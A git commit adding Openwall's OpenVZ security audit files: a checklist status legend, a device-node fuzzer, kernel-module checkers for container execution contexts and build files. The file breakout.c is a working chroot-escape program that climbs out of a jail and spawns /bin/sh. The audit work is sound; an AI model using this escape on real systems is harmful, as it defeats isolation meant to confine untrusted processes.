Adding Openwall's OpenVZ audit. Courtesy of Solar Designer

Author: juliocesarfort

Openwall/OpenVZ-audit/checklist

@@ -0,0 +1,20 @@
+	(nothing) item yet to be done
+-	determined to not be done
+?	uncertain whether the item should be done
++	completed (code reviewed, etc.) - status may be available in subitems
++/-	partially completed, the rest is not to be done
++R	completed and Reported to OVZ team
++OK	code reviewed or functionality tested, no vulnerabilities found
++B	Bug(s) found (typically security-relevant)
++BF	Bug(s), already Fixed in current OVZ
++BU	Bug(s) in Upstream code with no OVZ specifics
++BR	Bug(s), already Reported to OVZ team
++BUR	Bug(s) in Upstream code, no OVZ specifics, already Reported to OVZ team
++WB	Would be Bug (if a non-default kernel option is enabled, etc.)
++ND	Need Documentation
++NDR	Need Documentation, already Reported to OVZ team
+
+Additional modifiers:
++..?	uncertain of the (preliminary) conclusion
++.. t	testing rather than code review was used
++..+t	testing was done in addition to code review

Openwall/OpenVZ-audit/checklist-legend

@@ -0,0 +1,12 @@
+#include <unistd.h>
+#include <sys/stat.h>
+
+int main(void)
+{
+	mkdir("x", 0700);
+	chroot("x");
+	chdir("../../../../../../../../../../..");
+	chroot(".");
+	execl("/bin/sh", "sh", 0);
+	return 1;
+}

Openwall/OpenVZ-audit/progs/breakout/breakout.c

@@ -0,0 +1,24 @@
+#include <unistd.h>
+#include <errno.h>
+
+#ifdef __linux__
+#include <linux/limits.h>
+#else
+#define NR_OPEN 1024
+#endif
+
+int close_all(void)
+{
+	int fd, max, err;
+
+	max = sysconf(_SC_OPEN_MAX);
+	err = max <= 0;
+
+	if (max < NR_OPEN)
+		max = NR_OPEN;
+
+	for (fd = 3; fd < max; fd++)
+		err |= close(fd) && errno != EBADF;
+
+	return -err;
+}

Openwall/OpenVZ-audit/progs/closeall/closeall.c

@@ -0,0 +1,5 @@
+CC=gcc
+CFLAGS = -Wall -O2 -fomit-frame-pointer
+LDFLAGS = -s
+
+all: devfuzzer

Openwall/OpenVZ-audit/progs/devfuzzer/Makefile

@@ -0,0 +1,51 @@
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+
+#define DEVNAME "tmpdev"
+
+static void fuzzer(mode_t type)
+{
+	mode_t mode = type | (S_IRUSR | S_IWUSR);
+	unsigned int major, minor;
+	int retval, saved_errno;
+
+	unlink(DEVNAME);
+
+	for (major = 0; major < 1024; major++)
+	for (minor = 0; minor < 256; minor++) {
+		retval = mknod(DEVNAME, mode, makedev(major, minor));
+		if (retval == -1) {
+			saved_errno = errno;
+			unlink(DEVNAME);
+			printf("mknod %c %u %u = -1 errno=%d (\"%s\")\n",
+				"cb"[type == S_IFBLK], major, minor,
+				saved_errno, strerror(saved_errno));
+			continue;
+		}
+
+		retval = open(DEVNAME, O_RDONLY | O_NOCTTY);
+		saved_errno = errno;
+		unlink(DEVNAME);
+		if (retval >= 0)
+			close(retval);
+
+		printf("open %c %u %u = %d",
+			"cb"[type == S_IFBLK], major, minor, retval);
+		if (retval == -1)
+			printf(" errno=%d (\"%s\")",
+				saved_errno, strerror(saved_errno));
+		putchar('\n');
+	}
+}
+
+int main(void)
+{
+	fuzzer(S_IFCHR);
+	fuzzer(S_IFBLK);
+	return 0;
+}

Openwall/OpenVZ-audit/progs/devfuzzer/devfuzzer.c

@@ -0,0 +1,4 @@
+CC = gcc
+CFLAGS = -O2 -I/lib/modules/2.6.8-022stab050.1-smp/build/include -I/lib/modules/2.6.8-022stab050.1-smp/build/include/asm-i386/mach-default
+
+all: eechecker1.o eechecker2.o

Openwall/OpenVZ-audit/progs/eechecker/Makefile

@@ -0,0 +1,45 @@
+#define MODULE
+#define __KERNEL__
+#define _LOOSE_KERNEL_NAMES
+#define __SMP__
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/sched.h>
+
+#define WATCHPID 20538
+
+int init_module(void)
+{
+	struct task_struct *task;
+	unsigned int i;
+
+	task = find_task_by_pid_ve(WATCHPID);
+	if (!task)
+		return -ESRCH;
+
+	for (i = 0; i < 0x10000000; i++) {
+		rmb();
+		if (ve_is_super(VE_TASK_INFO(task)->exec_env)) {
+			printk("ve_is_super at %u\n", i);
+			return -EEXIST;
+		}
+	}
+
+	return -EAGAIN;
+}
+
+void cleanup_module(void)
+{
+}
+
+#include <linux/vermagic.h>
+
+// MODULE_INFO(vermagic, VERMAGIC_STRING);
+MODULE_LICENSE("GPL");
+
+struct module __this_module
+__attribute__((section(".gnu.linkonce.this_module"))) = {
+	.name = "exec_env_checker",
+	.init = init_module,
+	.exit = cleanup_module
+};

Openwall/OpenVZ-audit/progs/eechecker/eechecker1.c

@@ -0,0 +1,40 @@
+#define MODULE
+#define __KERNEL__
+#define _LOOSE_KERNEL_NAMES
+#define __SMP__
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/sched.h>
+
+int init_module(void)
+{
+	struct task_struct *task;
+
+	for_each_process_all(task) {
+		printk("pid=%u ve_task_info=%p exec_env=%p "
+			"task_bc=%p exec_ub=%p\n",
+			task->pid,
+			VE_TASK_INFO(task),
+			VE_TASK_INFO(task)->exec_env,
+			task_bc(task),
+			task_bc(task)->exec_ub);
+	}
+
+	return -EAGAIN;
+}
+
+void cleanup_module(void)
+{
+}
+
+#include <linux/vermagic.h>
+
+// MODULE_INFO(vermagic, VERMAGIC_STRING);
+MODULE_LICENSE("GPL");
+
+struct module __this_module
+__attribute__((section(".gnu.linkonce.this_module"))) = {
+	.name = "exec_env_checker",
+	.init = init_module,
+	.exit = cleanup_module
+};

Openwall/OpenVZ-audit/progs/eechecker/eechecker2.c

@@ -0,0 +1,5 @@
+CC=gcc
+CFLAGS = -Wall -O2 -fomit-frame-pointer
+LDFLAGS = -s
+
+all: iflood